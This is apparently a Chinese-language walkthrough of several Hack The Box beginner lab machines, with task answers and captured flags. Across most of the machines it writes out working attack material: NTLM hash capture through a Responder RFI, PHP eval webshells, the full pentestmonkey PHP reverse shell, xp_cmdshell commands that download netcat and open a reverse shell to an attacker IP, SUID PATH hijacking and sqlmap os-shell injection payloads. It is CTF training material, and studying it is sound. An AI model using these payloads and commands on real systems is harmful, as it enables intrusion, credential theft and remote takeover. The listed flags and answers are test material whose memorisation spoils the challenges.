      --retry-attempts int                Times to retry on request timeout (default 3)
  -s, --status-codes string               Positive status codes (will be overwritten with status-codes-blacklist if set). Can also handle ranges like 200,300-400,404.
  -b, --status-codes-blacklist string     Negative status codes (will override status-codes if set). Can also handle ranges like 200,300-400,404. (default "404")
      --timeout duration                  HTTP Timeout (default 10s)
  -u, --url string                        The target URL
  -a, --useragent string                  Set the User-Agent string (default "gobuster/3.6")
  -U, --username string                   Username for Basic Auth

Global Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defaults to 0)

Task 9

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

我们可以使用目录暴力破解来识别哪个 PHP 文件,这将提供对 Web 服务进行身份验证的机会?

login.php

image-20241210200728355

Submit Flag

Submit root flag

image-20241210201044293

admin/rKXM59ESxesUFHAd

image-20241210201121136

c7110277ac44d78b6a9fff2232434d16

Responder

Task 1

When visiting the web service using the IP address, what is the domain that we are being redirected to?

使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?

unika.htb

image-20241210201910119

Task 2

Which scripting language is being used on the server to generate webpages?

服务器上使用哪种脚本语言来生成网页?

nano /etc/hosts
添加如下
10.129.74.53    unika.htb	

index.php可以发现是php

image-20241210203622044

php

Task 3

What is the name of the URL parameter which is used to load different language versions of the webpage?

用于加载不同语言版本的网页的 URL 参数的名称是什么?

page

Task 4

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”

‘page’ 参数的以下哪个值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../../../../../../../windows/system32/drivers/etc/hosts“, ”minikatz.exe”

…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts

image-20241210204055410

Task 5

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”

‘page’ 参数的以下哪个值是利用远程文件包含 (RFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../../../../../../../windows/system32/drivers/etc/hosts“, ”minikatz.exe”

//10.10.14.6/somefile

Task 6

What does NTLM stand for?

NTLM 代表什么?

New Technology LAN Manager

NTLM - Wikipedia

Task 7

Which flag do we use in the Responder utility to specify the network interface?

我们在 Responder 实用程序中使用哪个标志来指定网络接口?

-i

┌──(root㉿7)-[~]
└─# responder -h
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

Usage: responder -I eth0 -w -d
or:
responder -I eth0 -wd

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i 10.0.0.21, --ip=10.0.0.21
                        Local IP to use (only for OSX)
  -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
                        Poison all requests with another IPv6 address than
                        Responder's one.
  -e 10.0.0.22, --externalip=10.0.0.22
                        Poison all requests with another IP address than
                        Responder's one.
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -d, --DHCP            Enable answers for DHCP broadcast requests. This
                        option will inject a WPAD server in the DHCP response.
                        Default: False
  -D, --DHCP-DNS        This option will inject a DNS server in the DHCP
                        response, otherwise a WPAD server will be added.
                        Default: False
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
                        False
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective. Default: False
  -Q, --quiet           Tell Responder to be quiet, disables a bunch of
                        printing from the poisoners. Default: False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  --disable-ess         Force ESS downgrade. Default: False
  -v, --verbose         Increase verbosity.

Task 8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

有几种工具采用 NetNTLMv2 质询/响应并尝试数百万个密码,以查看它们是否生成相同的响应。其中一种工具通常被称为“john”,但全名是什么?。

John the Ripper

Task 9

What is the password for the administrator user?

管理员用户的密码是什么?

发现很多协议都被ban了

image-20241211014059089

image-20241211014007299

responder进行监听

responder -I tun0

访问

http://unika.htb/?page=//10.10.16.53/n0o0b

拿到NTLM

储存在/usr/share/responder/logs目录下

image-20241211004133686

john爆破密码

image-20241211011847300

Task 10

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

我们将使用 Windows 服务(即在盒子上运行)使用我们恢复的密码远程访问 Responder 计算机。它监听哪个端口 TCP?

image-20241211013451014

5985

Submit Flag

Submit root flag

evil-winrm -i 10.129.46.194 -u administrator -p badminton

image-20241211014643102

ea81b7afddd03efaa0945333ed147fac

Three

Task 1

How many TCP ports are open?

打开了多少个 TCP 端口?

2

image-20241212021134992

Task 2

What is the domain of the email address provided in the “Contact” section of the website?

网站“联系方式”部分提供的电子邮件地址的域名是什么?

thetoppers.htb

image-20241211161858831

Task 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?

/etc/hosts

Task 4

Which sub-domain is discovered during further enumeration?

在进一步枚举过程中发现了哪个子域?

添加映域名-ip射到hosts

echo "10.129.36.18  thetoppers.htb" >> /etc/hosts

使用gobuster扫描子域

gobuster >=3.2.0务必加上 --append-domain

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb  --append-domain

image-20241212192049020

子域s3.thetoppers.htb

Task 5

Which service is running on the discovered sub-domain?

发现的子域上运行了哪些服务?

echo "10.129.36.18  s3.thetoppers.htb" >> /etc/hosts

image-20241212193950334

Amazon S3

Amazon S3,全名为亚马逊简易存储服务(Amazon Simple Storage Service),是亚马逊公司利用其亚马逊网络服务系统所提供的网络在线存储服务。

Task 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互?

需要用到aws-cli

AWS CLI 基本使用 - 简书

安装
apt install awscli
配置
aws configure

Task 7

Which command is used to set up the AWS CLI installation?

使用哪个命令设置 AWS CLI 安装?

aws configure

Task 8

What is the command used by the above utility to list all of the S3 buckets?

上述实用程序使用什么命令列出所有 S3 存储桶?

--endpoint-url (string)
       Override command's default URL with the given URL.

ls — AWS CLI 1.36.20 命令参考

aws --endpoint=http://s3.thetoppers.htb s3 ls

答案去掉–endpoint=

image-20241212234125628

Task 9

This server is configured to run files written in what web scripting language?

image-20241212234553772

php

Submit Flag

Submit root flag

写一个shell

<?php eval(POST['n0o0b']);?>

上传

image-20241212233720964

蚁剑连接,找到flag

image-20241212234251610

a980d99281a28d638ac68b9bf9453c2b

TIER 2

在第三层,您将获得网络安全渗透测试方面的高级技能,扩展您的知识和能力。您将首先掌握利用 XXE、IDOR 和 Log4j 等漏洞的技巧,从而发现和利用目标系统中的弱点。您还将深入研究 cookie 操纵的世界,使您能够操纵和控制用户会话,这是道德黑客的关键技能。

随着您的进步,您将了解二进制路径劫持和利用 sudo 权限,从而使您能够有效地执行权限提升。了解暴力破解的基础知识将成为您的渗透测试工具包中的宝贵工具,可帮助您发现弱密码并获得未经授权的访问。

此外,您将探索如何利用 LXD 进行特权文件系统访问,并深入了解如何利用 PHP 中的不安全函数,例如 PHP 中的“strcmp()”,这些功能经常用于 Web 应用程序。这个全面的层级为您提供了广泛的高级技术和知识,让您在网络安全渗透测试领域取得成功。

  • 了解如何利用 XXE、IDOR、Log4j 并执行 cookie 操作。
  • 了解如何利用二进制路径劫持和 sudo 权限进行权限提升。
  • 了解爆破的基础知识。
  • 了解如何利用 LXD 进行特权文件系统访问。
  • 了解如何在 PHP 中利用不安全的函数,如 “stcmp()”。

Archetype

Task 1

Which TCP port is hosting a database server?

哪个 TCP 端口托管数据库服务器?

扫描

┌──(root㉿7)-[~]
└─# nmap -sV 10.129.95.187
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

1433端口暴露SQL Server

image-20241213002003199

Task 2

What is the name of the non-Administrative share available over SMB?

SMB 上可用的非管理共享的名称是什么?

backups

image-20241213002852070

Task 3

What is the password identified in the file on the SMB share?

在 SMB 共享上的文件中标识的密码是什么?

发现prod.dtsConfig,get下来

其中包含了SQL Server数据库的连接信息,包括域账户和密码

image-20241213003712813

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

M3g4c0rp123

Task 4

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

Impacket 集合中的哪些脚本可用于建立与 Microsoft SQL Server 的经过身份验证的连接?

mssqlclient.py

┌──(root㉿7)-[~/ctf/impacket/examples]
└─# python3 mssqlclient.py -h
Impacket v0.13.0.dev0+20241209.91717.0fd9f288 - Copyright Fortra, LLC and its affiliated companies

usage: mssqlclient.py [-h] [-db DB] [-windows-auth] [-debug] [-show] [-command [COMMAND ...]] [-file FILE]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                      [-target-ip ip address] [-port PORT]
                      target

TDS client implementation (SSL supported).

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON
  -show                 show the queries
  -command [COMMAND ...]
                        Commands to execute in the SQL shell. Multiple commands can be passed.
  -file FILE            input file with commands to execute in the SQL shell

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target
                        parameters. If valid credentials cannot be found, it will use the ones specified in the
                        command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the
                        target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target.
                        This is useful when target is the NetBIOS name and you cannot resolve it
  -port PORT            target MSSQL port (default 1433)

注意/-windows-auth

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187   -windows-auth

image-20241213023839799

Task 5

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

可以使用 Microsoft SQL Server 的哪些扩展存储过程来生成 Windows 命令 shell?

SQL (ARCHETYPE\sql_svc  dbo@master)> help

    lcd {path}                 - changes the current local directory to {path}
    exit                       - terminates the server process (and this session)
    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell        - you know what it means
    enum_db                    - enum databases
    enum_links                 - enum linked servers
    enum_impersonate           - check logins that can be impersonated
    enum_logins                - enum login users
    enum_users                 - enum current db users
    enum_owner                 - enum db owner
    exec_as_user {user}        - impersonate with execute as user
    exec_as_login {login}      - impersonate with execute as login
    xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    xp_dirtree {path}          - executes xp_dirtree on the path
    sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
    use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
    ! {cmd}                    - executes a local shell cmd
    upload {from} {to}         - uploads file {from} to the SQLServer host {to}
    show_query                 - show query
    mask_query                 - mask query

xp_cmdshell

直接执行EXEC xp_cmdshell {cmd};会报错

image-20241213134619650

这是因为 SQL Server 中的 xp_cmdshell 功能尚未启用

执行如下

-- 允许高级选项
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- 启用 xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

image-20241213134959345

Task 6

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

可以使用什么脚本来搜索可能的路径以提升 Windows 主机上的权限?

netcat 1.11 for Win32/Win64

我们需要上传nc.exe上去,用于反弹shell

在主机开启http服务供靶机下载

python3 -m http.server

在靶机使用curl或者powershell内置wget进行下载

用于下载和反弹shell的ip为tun0的ip

EXEC xp_cmdshell 'curl -o nc.exe http://10.10.16.53:8000/nc64.exe';

没有权限

image-20241213141019101

EXEC xp_cmdshell 'dir C:\Users';

image-20241213141220010

down到当前用户目录下

EXEC xp_cmdshell 'curl -o C:\Users\sql_svc\nc.exe http://10.10.16.53:8000/nc64.exe';
或
EXEC xp_cmdshell 'powershell -c wget -o C:\Users\sql_svc\nc.exe http://10.10.16.53:8000/nc64.exe';

image-20241213141321267

一切就绪,我们在主机进行nc监听,准备反弹shell

nc -lvvp 8888
EXEC xp_cmdshell 'C:\Users\sql_svc\nc 10.10.16.53 8888 -e powershell';

image-20241213142257634

uers用户下的flag可以轻松拿到

image-20241213143246307

但administrator需要winPEAS辅助提权

img

Task 7

What file contains the administrator’s password?

哪个文件包含管理员的密码?

peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

和上传nc一样

wget http://10.10.16.53:8000/winPEASx64.exe -o winPEASx64.exe

执行./winPEASx64.exe

image-20241213150303138

查看ps历史记录,发现密码

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt储存ps历史记录

image-20241213150434534

MEGACORP_4dm1n!!

Submit Flag

Submit user flag

3e7b102e78218e935bf3f4951fec21a3

Submit Flag

Submit root flag

拿到密码MEGACORP_4dm1n!!

python3 psexec.py ARCHETYPE/administrator@10.129.29.142

image-20241213162108059

b91ccec3305e98240082d4474b848528

Oopsie

Task 1

With what kind of tool can intercept web traffic?

用什么样的工具可以拦截网络流量?

proxy(代理)

Task 2

What is the path to the directory on the webserver that returns a login page?

Web 服务器上返回登录页面的目录的路径是什么?

开放80和22

image-20241213165627193

image-20241213180927425

/cdn-cgi/login

image-20241213181543406

Task 3

What can be modified in Firefox to get access to the upload page?

在 Firefox 中可以修改哪些内容以访问上传页面?

cookie

image-20241213195243824

Task 4

What is the access ID of the admin user?

admin 用户的访问 ID 是什么?

login as Guest

image-20241213194653615

Account

http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=2

image-20241213194823107

id=2时为admin账户信息

image-20241213194854244

Task 5

On uploading a file, what directory does that file appear in on the server?

上传文件时,该文件显示在服务器上的哪个目录中?

dirsearch -u http://10.129.95.191/

image-20241213200326901

/uploads

Task 6

What is the file that contains the password that is shared with the robert user?

包含与 robert 用户共享的密码的文件是什么?

文件上传无过滤

<?php @eval($_POST['cmd']); 

蚁剑连接

image-20241213201004287

Task 7

What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

使用选项 “-group bugtracker” 运行什么可执行项来识别 bugtracker 组拥有的所有文件?

find

似乎会定时删除uploads目录下文件,弹个shell

使用kali内置webshell/usr/share/webshells/php/php-reverse-shell.php,改ip和端口

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.53';  // CHANGE THIS
$port = 8888;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

攻击机nc -lvvp 8888监听,访问上传后的webshell

image-20241213214857957

利用python实现交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

如果不是交互式

image-20241213223138872

find / -group bugtracker 2>/dev/null

image-20241213230826897

Task 8

Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run?

无论哪个用户开始运行 bugtracker 可执行文件,用户权限将使用什么来运行?

先提个权,密码是数据库密码

image-20241213231557664

image-20241213231654785

文件所有者root,所属bugtracker组

image-20241213232057572

-:这是一个常规文件。如果是目录,通常显示为 d

rws:文件所有者(root)的权限:

  • r 表示可读(read)。

  • w 表示可写(write)。

  • ssetuid 位,表示程序将在执行时获得文件所有者的权限(即 root 权限)。

r-x:文件所属组(bugtracker)的权限:

  • r 表示组用户可以读取文件。
  • x 表示组用户可以执行文件。

r–:其他用户(即文件的非所有者和非同组用户)的权限:

  • r 表示其他用户可以读取文件。
  • -- 表示其他用户没有写权限和执行权限。

robert在bugtracker组中,可执行bugtracker

image-20241213232403560

Task 9

What SUID stands for?

SUID 代表什么?

Set owner User ID

Task 10

What is the name of the executable being called in an insecure manner?

以不安全的方式调用的可执行文件的名称是什么?

image-20241213235634415

cat

Submit Flag

Submit user flag

f2c74ee8db7983851ab2a96a44eb7981

Submit Flag

Submit root flag

image-20241213235557043

利用suid提权

由于bugtracker文件所有者权限为rws,程序将在执行时获得root权限,也就是说会以root权限执行cat

如果说能将cat命令改成sh,那岂不是就提权成功,不过我们没有对/bin/cat的修改权限

image-20241214000930168

查看环境变量PATH

image-20241214000229507

对于我们执行的命令会从PATH中从前往后依次查找,如上图,先从/usr/local/sbin中查找要执行的命令,若没有再从/user/local/bin查找,以此类推

而如果我们往PATH添加一个路径,将会添加在最前端

这样我们在添加的新目录下写一个cat执行sh即可拿到root的shell

提权过程:

image-20241214002817691

由于cat(原/bin/cat)已经被改为/home/rebert/cat,即/bin/sh,所以执行真cat要使用/bin/cat绝对路径

image-20241214003200957

af13b0bee69f8a877c3faf667f7beacf

Vaccine

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

除了 SSH 和 HTTP,此机器上还托管了哪些其他服务?

image-20241214014211858

ftp

Task 2

This service can be configured to allow login with any password for specific username. What is that username?

此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么?

FTP的匿名登录,用户名为anonymous

image-20241214014631115

Task 3

What is the name of the file downloaded over this service?

通过此服务下载的文件的名称是什么?

image-20241214020744534

Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

John The Ripper 工具集附带什么脚本,并从受密码保护的 zip 存档中生成哈希值,其格式允许破解尝试?

get下来以后解压发现需要密码

image-20241214020932510

使用john爆破

#生成hash
zip2john backup.zip > crack
#爆破
john -wordlist=/usr/share/wordlists/rockyou.txt crack

image-20241214021554313

拿到密码741852963

Task 5

What is the password for the admin user on the website?

解压发现index.php中存在密码md5:2cb42f8734ea607eefed3b70af13bbd3

image-20241214021952141

md5在线解密破解,md5解密加密在线解密一下

image-20241214022056772

qwerty789

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

可以向 sqlmap 传递什么选项来尝试通过 sql 注入来获取命令执行?

–os-shell

Task 7

What program can the postgres user run as root using sudo?

postgres 用户可以使用 sudo 以 root 身份运行什么程序?

账户:admin,密码:qwerty789 登录

image-20250103234204077

存在sql注入

image-20250103234743824

使用sqlmap,通过–os-shell拿到shell,注意加上cookie信息

成功与否和网络关系很大

┌──(root㉿7)-[~]
└─# sqlmap -u 'http://10.129.19.176/dashboard.php?search=' --cookie="PHPSESSID=vc16dihgis4gcqi255c21d3l20" --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:42:23 /2025-01-04/

[15:42:23] [WARNING] provided value for parameter 'search' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:42:23] [INFO] testing connection to the target URL
[15:42:24] [INFO] testing if the target URL content is stable
[15:42:25] [INFO] target URL content is stable
[15:42:25] [INFO] testing if GET parameter 'search' is dynamic
[15:42:25] [INFO] GET parameter 'search' appears to be dynamic
[15:42:26] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[15:42:27] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[15:42:27] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]

[15:42:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:42:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:42:50] [INFO] testing 'Generic inline queries'
[15:42:51] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:42:57] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable (with --string="SUV")
[15:42:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:42:58] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[15:42:58] [INFO] testing 'PostgreSQL inline queries'
[15:42:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:42:59] [WARNING] time-based comparison requires larger statistical model, please wait..... (done)
[15:43:15] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[15:43:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:43:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[15:43:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=' AND (SELECT (CASE WHEN (8897=8897) THEN NULL ELSE CAST((CHR(102)||CHR(83)||CHR(85)||CHR(108)) AS NUMERIC) END)) IS NULL-- hdzC

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=' AND 6465=CAST((CHR(113)||CHR(98)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6465=6465) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)) AS NUMERIC)-- XaMB

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=' AND 8920=(SELECT 8920 FROM PG_SLEEP(5))-- uICK
---
[15:43:41] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[15:43:49] [INFO] fingerprinting the back-end DBMS operating system
[15:43:50] [WARNING] reflective value(s) found and filtering out
[15:43:53] [INFO] the back-end DBMS operating system is Linux
[15:43:55] [INFO] testing if current user is DBA
[15:43:59] [INFO] retrieved: '1'
[15:44:00] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[15:44:00] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
